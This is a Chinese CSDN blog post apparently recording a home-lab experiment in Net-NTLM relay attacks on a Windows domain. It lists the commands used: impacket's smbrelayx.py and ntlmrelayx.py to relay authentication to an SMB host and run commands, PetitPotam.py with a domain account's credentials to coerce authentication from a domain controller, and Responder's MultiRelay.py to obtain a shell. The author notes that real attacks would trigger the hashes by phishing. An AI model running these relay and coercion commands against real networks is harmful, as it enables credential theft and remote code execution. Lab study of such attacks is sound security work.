重放Net-NTLM HASH 实验

于 2024-10-02 20:13:45 发布
阅读量127 收藏 2
点赞数 4
分类专栏: IntraNet 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/142684599
版权

先记录relay2SMB的,relay2LDAP的会补上来。

后面的一些利用EXCHANGE服务器的writedacl权限来relay2EWS + DCSync的等我安了EXCHANGE再说吧2333。。

1. relay2SMB

0x01 smbrelayx.py

监听Net-NTLM,然后中继到win2008的SMB服务,执行whoami命令:(oops,不能relay到域控。。。因为开了SMB签名,,)

python3 smbrelayx.py -h 192.168.72.139 -c whoami

接下来触发Net-NTLM:

很多方法,这里用打印机漏洞的话不行,

让域控的机器账户发起Net-NTLM:

python3 PetitPotam.py -d intranet.com -u win2008 -p 1q2w3eQWE 192.168.72.128 192.168.72.131

因为这是个机器账户,没法smb之类的。

这里选择用LLMNR触发(主要是弄清楚原理,实战肯定选择钓鱼啊。。。

在这里插入图片描述

在这里插入图片描述

0x02 nltmrelayx.py

还是impacket的,支持更多协议:

python3 ntlmrelayx.py -t smb://192.168.72.139 -c whoami -smb2support

一样的触发:

在这里插入图片描述

0x03 MultiRelay.py

这个是 Responder/tools 下的,可以通过 ALL参数拿到一个稳定的shell

./MultiRelay.py -t 192.168.72.139 -u ALL

在这里插入图片描述

N0zoM1z0
关注
专栏目录
Windows下LM-HashNTLM-Hash
02-11
文档描述了Windows下LM HASHNTLM HASH生成原理和规则。 并利用Python脚本进行模拟。 详细描述了 挑战/响应模式(鉴权协议)的原理 详细描述了NTLM SMB通信流程 对内网渗透入门感兴趣的一定下载
davil:使用webdav泄漏net-ntlm
03-04
DAVil 在UNC路径上托管带有图像的网站,并获得信誉。 绕过Intranet区域并通过Internet强制进行身份验证。 注意:后来发现,这仅适用于使用虚拟机管理程序定义的网络的虚拟主机,该主机将通过DNS将整合的IP地址解析...
SharpWebServer:具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器
03-30
一个使用C#编写的面向Red Team的简单HTTP和WebDAV服务器,具有捕获Net-NTLM哈希的功能。 用于为横向移动目的在受损机器上提供有效载荷。 需要.NET Framework 4.5和System.Net和System.Net.Sockets引用。 用法 :: ...
具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器-.NET开发
05-27
一个使用C#编写的面向Red Team的简单HTTP和WebDAV服务器,具有捕获Net-NTLM哈希的功能。 用于为横向移动目的在受损机器上提供有效载荷。 SharpWebServer这是一个用Red Hat C ++编写的面向Red Team的简单HTTP和...
python-ntlm 1.1.0
08-18
Python library that provides NTLM support, including an authentication handler for urllib2. Works with pass-the-hash in additon to password authentication.
FreeRTOS列表与列表项
luckyluckypolar的博客
09-29 843
列表与列表项实际上是FreeRTOS中一个大量使用的一种数据结构
新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
weixin_42944928的博客
09-26 419
【代码】新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
简单实现log记录保存到文本和数据库
星河队长
09-26 324
简单保存记录到txt,sqlite数据库,以及console监控记录。
单链表插入删除元素
2301_79012058的博客
09-28 618
应该使用。
C++中,如何使你设计的迭代器被标准算法库所支持。
weixin_42944928的博客
10-01 460
DListNodeIterator : _DList正向迭代器,继承于。下面是_DList源码,最后修改于2024-10-01。std::iterator : 标准库读写迭代器。_DList :是一个双向链表。
MyBatis<foreach>标签的用法与实践
GDFHGFHGFH的博客
09-26 519
demo1简单的一个批量更新,这里传入了一个List类型的集合作为参数,拼接到 in 的后面 ,来实现一个简单的批量更新</</collection=“allVisible”,allVisible代表传入的集合item=“visible” ,visible代表集合的每一个元素open=“(” 代表以( 开头separator=“,” 代表以“,”分隔,close=“)” 代表以“)”结束本质上这里是个拼接,所有要保证这里list不为空,不然会报错demo2。
Java工具--stream流
qq_55342245的博客
09-29 543
findFirst() 和 findAny() 都是获取列表中的第一条数据,但是findAny()操作,返回的元素是不确定的,对于同一个列表多次调用findAny()有可能会返回不同的值。使用findAny()是为了更高效的性能。如果是数据较少,串行地情况下,一般会返回第一个结果,如果是并行(parallelStream并行流)的情况,那就不能确保是第一个。使用 mapToInt() 求整数列表中的最大值、最小值、总和、平均值。使用 findAny() 和 findFirst() 获取第一条数据。
C# 泛型使用案例_C# 泛型使用整理
天马3798
09-28 522
2.泛型委托,输入参数,输出参数。2. 自定义规则和类型,求和处理。3.泛型任务,多线程,异步编程。1. 任意类型数据交换。
红米k60至尊版工程固件 MTK芯片 资源预览 刷写说明 与nv损坏修复去除电阻图示
小马哥的专栏
09-27 208
红米k60至尊版机型代码为:corot。搭载了联发科天玑9200+处理器。此固件mtk引导为MT6985。博文将简单说明此固件的一些特点与刷写注意事项。对于NV损坏的机型。展示修改校验电阻的图示。方便改写参数等 通过博文了解 1💝💝💝-----此机型工程固件的资源刷写注意事项 2💝💝💝-----此机型刷写工程固件预览界面 3💝💝💝 ------nv损坏的修复方法说明解析以及主板校验电阻图示
Java基于easyExcel的自定义表格格式
qq_48050838的博客
09-29 335
这里用的到easyExcel版本为3.3.4。
双链表(纯代码)
最新发布
Starry_tsx的博客
10-01 257
【代码】双链表(纯代码)
ArrayList源码实现(一)
weixin_53294082的博客
09-26 1137
ArrayList是如何进行动态扩容的,为什么ArrayList 插入与移除的效率较低
基于 python 实现的ios混淆脚本工具
10-01
【作品名称】:基于 python 实现的ios混淆脚本工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: . addNative.py 生成oc垃圾代码工具 此脚本会扫描指定目录,给OC文件添加垃圾函数,同时创建垃圾文件到/trash目录。 参数说明 --oc_folder OC_FOLDER OC_FOLDER为OC代码所在目录 --replace替换OC_FOLDER下的原文件,同时原代码会备份到脚本目录下的backup_ios目录。不指定此项垃圾代码只会放到脚本目录下的target_ios/ addNative.py里还有一些配置可以看需求手动修改,如生成垃圾文件的数量,垃圾函数的数量,忽略文件列表等,具体请查看代码顶部相关注释 renameNative.py 修改类名前缀工具 类名是引用可能较为复杂 【资源声明】:本资源作为“参考资料”而不是“定制需求”,代码只能作为参考,不能完全复制照搬。需要有一定的基础能够看懂代码,能够自行调试代码并解决报错,能够自行添加功能修改代码。
基于SOM算法对IRIS数据集分类_Learning-Som_IrisClassification.zip
10-01
基于SOM算法对IRIS数据集分类_Learning-Som_IrisClassification
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值